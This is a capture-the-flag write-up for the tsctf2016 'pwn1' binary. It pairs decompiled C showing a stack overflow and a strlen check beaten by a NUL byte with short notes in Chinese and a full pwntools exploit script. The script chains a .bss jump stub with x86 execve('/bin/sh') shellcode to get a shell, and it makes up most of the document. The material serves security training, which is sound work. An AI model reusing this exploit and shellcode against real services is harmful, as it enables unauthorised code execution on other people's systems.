pwn1
thoughts
/* IDA decompiler output for the vulnerable routine. The names, the
 * frame-offset comment on v1 and the unk_ symbol are the decompiler's;
 * the note further down reports that gdb places the buffer at ebp-0x28
 * rather than the bp-0x20 shown here. */
int sub_804857D()
{
    int v1; // [sp+10h] [bp-20h]@1  -- declared as a 4-byte int but used as the 0x80-byte read() target below
    /* Unbuffered stdio so the prompts reach the client immediately. */
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    printf("=====Welcome to tsctf2016!=====\n\nPlease input your name:");
    /* 16 bytes of caller-controlled data into a global at a fixed .bss
     * address (non-PIE). As the notes below describe, that content is later
     * used as a jump target, which presupposes the page is executable (NX off). */
    read(0, &unk_804A065, 0x10u);
    printf("What do you what to say:");
    /* Stack buffer overflow: up to 0x80 bytes are stored into a slot that
     * sits 0x20 bytes below the saved frame pointer, and read() does not
     * NUL-terminate. Fix: give the buffer a real size and bound the read to
     * it (e.g. `read(0, buf, sizeof buf - 1)`), then use read()'s return
     * value as the length. */
    read(0, &v1, 0x80u);
    /* Not a length guard: strlen() stops at the first NUL, so a leading
     * '\0' makes it return 0 and the check passes no matter how many bytes
     * read() actually wrote. */
    if ( strlen((const char *)&v1) > 0x1F )
    {
        puts("you dian CHOU!!!");
        exit(0);
    }
    puts("You are beautiful!");
    return 0;
}
- 第一个read处,unk_804A065位于bss段,可以在此处布置asm,利用第二个read处的bof来跳转到此处。
- 在第二个read处,利用\x00来绕过strlen的长度判断。此处,\x00后布置shellcode、覆盖ebp、返回地址。
bof处payload两种写法:
- payload = '\x00' + shellcode + '\x90'*18 + p32(0xdeadbeaf) + p32(bss_addr)
- payload = '\x00' + '\x90'*39 + p32(0xdeadbeaf) + p32(bss_addr) + shellcode
总结
- 看到漏洞,思考此处可以干嘛。如:16个字节的bss段可读可写地址确定。
- IDA中buf的位置是[bp-0x20],但是gdb调试时,buf的位置是ebp-0x28,不知道为啥,感觉IDA有时候反编译的不准确。
exp
from pwn import *
# --- target ---
proc_name = 'pwn1'
#socat TCP4-LISTEN:10001,fork EXEC:./pwn1
ip = '127.0.0.1'
port = 10001

# --- run-time switches (1 = on) ---
debug = 1           # pwn() raises the pwntools log level to 'debug'
local = 1           # 1: spawn proc_name locally, 0: connect to ip:port
attach = local & 0  # gdb attach, wired off here
bps = attach & 1    # additionally load the 'bps' file when attaching

# Tube (process or remote connection); populated by makeio().
io = None
def makeio():
    """Create the module-level tube ``io``.

    A local ``process`` of ``proc_name`` when ``local`` is set, otherwise a
    ``remote`` connection to ``ip``:``port``.
    """
    global io
    io = process(proc_name) if local else remote(ip, port)
def ru(data):
    """Receive from the global tube until *data* is seen (``recvuntil``)."""
    tube = io
    return tube.recvuntil(data)
def rv():
    """Receive whatever is currently available on the global tube (``recv``)."""
    tube = io
    return tube.recv()
def sl(data):
    """Send *data* followed by a newline on the global tube (``sendline``)."""
    tube = io
    return tube.sendline(data)
def sn(data):
    """Send *data* as-is, without a trailing newline, on the global tube (``send``)."""
    tube = io
    return tube.send(data)
def rl():
    """Receive one line from the global tube (``recvline``)."""
    tube = io
    return tube.recvline()
def pwn1() -> None:
    """Exploit variant 1: shellcode placed *before* the overwritten return address.

    Stage 1 plants a three-instruction stub in the 16-byte .bss name buffer;
    stage 2 overflows the stack slot and returns into that stub, which
    transfers control back down into the stack-resident shellcode.
    Reads the module-level ``shellcode`` and ``bss_addr``.
    """
    ru("name:")
    # call ebp-0x2f
    # Stub that runs at bss_addr after the ret: rebuilds ebp from esp and
    # calls into the stack. 0x2F is the author's measured distance to the
    # shellcode (cf. the IDA-vs-gdb frame note above); not re-verified here.
    jmpebp = asm('mov ebp,esp;sub ebp,0x2F;call ebp')
    payload = jmpebp.ljust(16,chr(0x90));sn(payload) # sl will send \n
    #payload = 16*'\x90';sn(payload) # sl will send \n
    ru("say:")
    # Leading NUL makes strlen() return 0, so the binary's `> 0x1F` check
    # passes although 0x80 bytes were read -- the read() size, not strlen(),
    # is what bounds the bytes landing on the stack.
    # Layout: NUL | shellcode (21) | 18 NOPs | saved ebp (placeholder) | ret -> bss stub.
    # 1 + 21 + 18 = 40 = 0x28 bytes reach the saved ebp, matching the gdb
    # offset noted above. A stack canary, NX on .bss, or PIE/ASLR would each
    # break this chain.
    payload = '\x00' + shellcode +'\x90'*18 +p32(0xdeadbeaf) +p32(bss_addr);sn(payload)
    print len(payload)  # Python 2 print statement: this script targets Python 2 pwntools
    io.interactive()
def pwn2() -> None:
    """Exploit variant 2: shellcode placed *after* the overwritten return address.

    Stage 1 plants a ``jmp esp`` stub in the 16-byte .bss name buffer; stage 2
    overflows the stack slot so the ret lands on that stub, and after the ret
    esp points just past the return-address slot, i.e. at the shellcode.
    Reads the module-level ``shellcode`` and ``bss_addr``.
    """
    ru("name:")
    # Stub that runs at bss_addr after the ret; no frame arithmetic needed.
    jmpebp = asm('jmp esp')
    payload = jmpebp.ljust(16,chr(0x90));sn(payload) # sl will send \n
    #payload = 16*'\x90';sn(payload) # sl will send \n
    ru("say:")
    # Leading NUL defeats the strlen()-based check (see pwn1 and the notes
    # above). Layout: NUL | 39 NOPs | saved ebp (placeholder) | ret -> bss stub | shellcode.
    # 1 + 39 = 40 = 0x28 bytes reach the saved ebp, as in pwn1. A stack
    # canary, NX on .bss, or PIE/ASLR would each break this chain.
    payload = '\x00' +'\x90'*39 +p32(0xdeadbeaf) + p32(bss_addr) + shellcode;sn(payload)
    print len(payload)  # Python 2 print statement: this script targets Python 2 pwntools
    io.interactive()
def pwn() -> None:
    """Set up the target tube, optionally attach gdb, then run ``pwn2()``.

    The module switches ``debug``, ``attach`` and ``bps`` select debug
    logging, gdb attachment and loading of the 'bps' file respectively.
    """
    makeio()
    if debug:
        context.log_level = 'debug'
    if attach:
        if bps:
            # 'bps' is a file in the working directory handed to gdb.attach;
            # presumably a gdb script with breakpoints -- not shown on this page.
            gdb.attach(pidof(proc_name)[0], open('bps'))
        else:
            gdb.attach(pidof(proc_name)[0])
    # Fixed .bss address of the 16-byte name buffer (target of the binary's
    # first read()); hard-coded, so it only holds for a non-PIE build.
    bss_addr = 0x0804A065
    # 21 bytes of raw x86 shellcode, kept exactly as the author wrote them.
    shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
    shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
    shellcode += "\x0b\xcd\x80"
    # NOTE(review): indentation was lost in this paste. pwn1()/pwn2() read
    # ``shellcode`` and ``bss_addr`` as globals, so these two assignments must
    # really be module-level; as locals of pwn() they would raise NameError.
    pwn2()
if __name__ == "__main__":
    # Script entry point: build the tube and run the selected exploit path.
    pwn()